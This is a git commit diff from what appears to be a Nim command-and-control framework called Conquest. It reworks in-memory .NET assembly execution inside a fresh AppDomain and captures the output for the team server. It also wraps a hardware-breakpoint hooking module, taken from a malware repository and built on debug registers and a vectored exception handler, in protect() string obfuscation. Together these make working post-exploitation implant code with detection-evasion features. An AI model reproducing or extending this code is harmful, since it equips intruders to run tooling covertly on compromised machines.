Fixed issue that caused assembly execution to fail when used more than once in a session.
This commit is contained in:
Jakob Friedl
@@ -56,26 +56,39 @@ proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[stri
|
||||
|
||||
# For the actual assembly execution, the winim/[clr] library takes care of most of the heavy lifting for us here
|
||||
# - https://github.com/khchen/winim/blob/master/winim/clr.nim
|
||||
var assembly = load(assemblyBytes)
|
||||
var mscorlib = load(protect("mscorlib"))
|
||||
|
||||
# Create AppDomain
|
||||
let appDomainType = mscorlib.GetType(protect("System.AppDomain"))
|
||||
let domainSetup = mscorlib.new(protect("System.AppDomainSetup"))
|
||||
domainSetup.ApplicationBase = getCurrentDir()
|
||||
domainSetup.DisallowBindingRedirects = false
|
||||
domainSetup.DisallowCodeDownload = true
|
||||
domainSetup.ShadowCopyFiles = protect("false")
|
||||
|
||||
let domain = @appDomainType.CreateDomain(protect("AppDomain"), toCLRVariant(nil), domainSetup)
|
||||
|
||||
# Load assembly
|
||||
let assemblyType = mscorlib.GetType("System.Reflection.Assembly")
|
||||
let assembly = @assemblyType.Load(assemblyBytes.toCLRVariant(VT_UI1))
|
||||
|
||||
# Parsing the arguments to be passed to the assembly
|
||||
var args = arguments.toCLRVariant(VT_BSTR)
|
||||
|
||||
# Redirect the output of the assembly to a .NET StringWriter so we can return it to the team server over the network
|
||||
var
|
||||
mscor = load(protect("mscorlib"))
|
||||
io = load(protect("System.IO"))
|
||||
Console = mscor.GetType(protect("System.Console"))
|
||||
StringWriter = io.GetType(protect("System.IO.StringWriter"))
|
||||
Console = mscorlib.GetType(protect("System.Console"))
|
||||
StringWriter = mscorlib.GetType(protect("System.IO.StringWriter"))
|
||||
|
||||
var stringWriter = @StringWriter.new()
|
||||
var oldConsole = @Console.Out
|
||||
@Console.SetOut(stringWriter)
|
||||
|
||||
# Execute the assemblies entry point
|
||||
# Execute the entry point of the assembly
|
||||
assembly.EntryPoint.Invoke(nil, toCLRVariant([args]))
|
||||
|
||||
# Reset console properties
|
||||
# Cleanup
|
||||
@Console.SetOut(oldConsole)
|
||||
@appDomainType.Unload(domain)
|
||||
|
||||
return (assembly, fromCLRVariant[string](stringWriter.ToString()))
|
||||
@@ -1,4 +1,5 @@
|
||||
import winim/lean
|
||||
import ../../common/utils
|
||||
|
||||
# From: https://github.com/m4ul3r/malware/blob/main/nim/hardware_breakpoints/hardwarebreakpoints.nim
|
||||
|
||||
@@ -32,7 +33,7 @@ proc setHardwareBreakpoint*(pAddress: PVOID, fnHookFunc: PVOID, drx: DRX): bool
|
||||
threadCtx.ContextFlags = CONTEXT_DEBUG_REGISTERS
|
||||
|
||||
if GetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
|
||||
echo "[!] GetThreadContext Failed: ", GetLastError()
|
||||
echo protect("[!] GetThreadContext Failed: "), GetLastError()
|
||||
return false
|
||||
|
||||
case drx:
|
||||
@@ -58,7 +59,7 @@ proc setHardwareBreakpoint*(pAddress: PVOID, fnHookFunc: PVOID, drx: DRX): bool
|
||||
threadCtx.Dr7 = setDr7Bits(threadCtx.Dr7, (cast[int](drx) * 2), 1, 1)
|
||||
|
||||
if SetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
|
||||
echo "[!] SetThreadContext Failed", GetLastError()
|
||||
echo protect("[!] SetThreadContext Failed: "), GetLastError()
|
||||
return false
|
||||
|
||||
return true
|
||||
@@ -68,7 +69,7 @@ proc removeHardwareBreakpoint*(drx: DRX): bool =
|
||||
threadCtx.ContextFlags = CONTEXT_DEBUG_REGISTERS
|
||||
|
||||
if GetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
|
||||
echo "[!] GetThreadContext Failed: ", GetLastError()
|
||||
echo protect("[!] GetThreadContext Failed: "), GetLastError()
|
||||
return false
|
||||
|
||||
# Remove the address of the hooked function from the thread context
|
||||
@@ -86,7 +87,7 @@ proc removeHardwareBreakpoint*(drx: DRX): bool =
|
||||
threadCtx.Dr7 = setDr7Bits(threadCtx.Dr7, (cast[int](drx) * 2), 1, 0)
|
||||
|
||||
if SetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
|
||||
echo "[!] SetThreadContext Failed", GetLastError()
|
||||
echo protect("[!] SetThreadContext Failed"), GetLastError()
|
||||
return false
|
||||
|
||||
return true
|
||||
@@ -195,7 +196,7 @@ proc initializeHardwareBPVariables*(): bool =
|
||||
# Add 'VectorHandler' as the VEH
|
||||
g_VectorHandler = AddVectoredExceptionHandler(1, cast[PVECTORED_EXCEPTION_HANDLER](vectorHandler))
|
||||
if cast[int](g_VectorHandler) == 0:
|
||||
echo "[!] AddVectoredExceptionHandler Failed"
|
||||
echo protect("[!] AddVectoredExceptionHandler Failed")
|
||||
return false
|
||||
|
||||
if (cast[int](g_VectorHandler) and cast[int](g_CriticalSection.DebugInfo)) != 0:
|
||||
|
||||
@@ -12,11 +12,9 @@ proc makeAgentLogDirectory*(cq: Conquest, agentId: string): bool =
|
||||
return false
|
||||
|
||||
proc log*(cq: Conquest, logEntry: string) =
|
||||
let
|
||||
# TODO: Fix issue where log files are written to the wrong agent when the interact agent is changed in the middle of command execution
|
||||
# Though that problem would not occur when a proper GUI is used in the future
|
||||
date = now().format("dd-MM-yyyy")
|
||||
agentLogPath = fmt"{CONQUEST_ROOT}/data/logs/{cq.interactAgent.agentId}/{date}.session.log"
|
||||
# TODO: Fix issue where log files are written to the wrong agent when the interact agent is changed in the middle of command execution
|
||||
# Though that problem would not occur when a proper GUI is used in the future
|
||||
let agentLogPath = fmt"{CONQUEST_ROOT}/data/logs/{cq.interactAgent.agentId}/session.log"
|
||||
|
||||
# Write log entry to file
|
||||
let file = open(agentLogPath, fmAppend)
|
||||
|
||||
Reference in New Issue
Block a user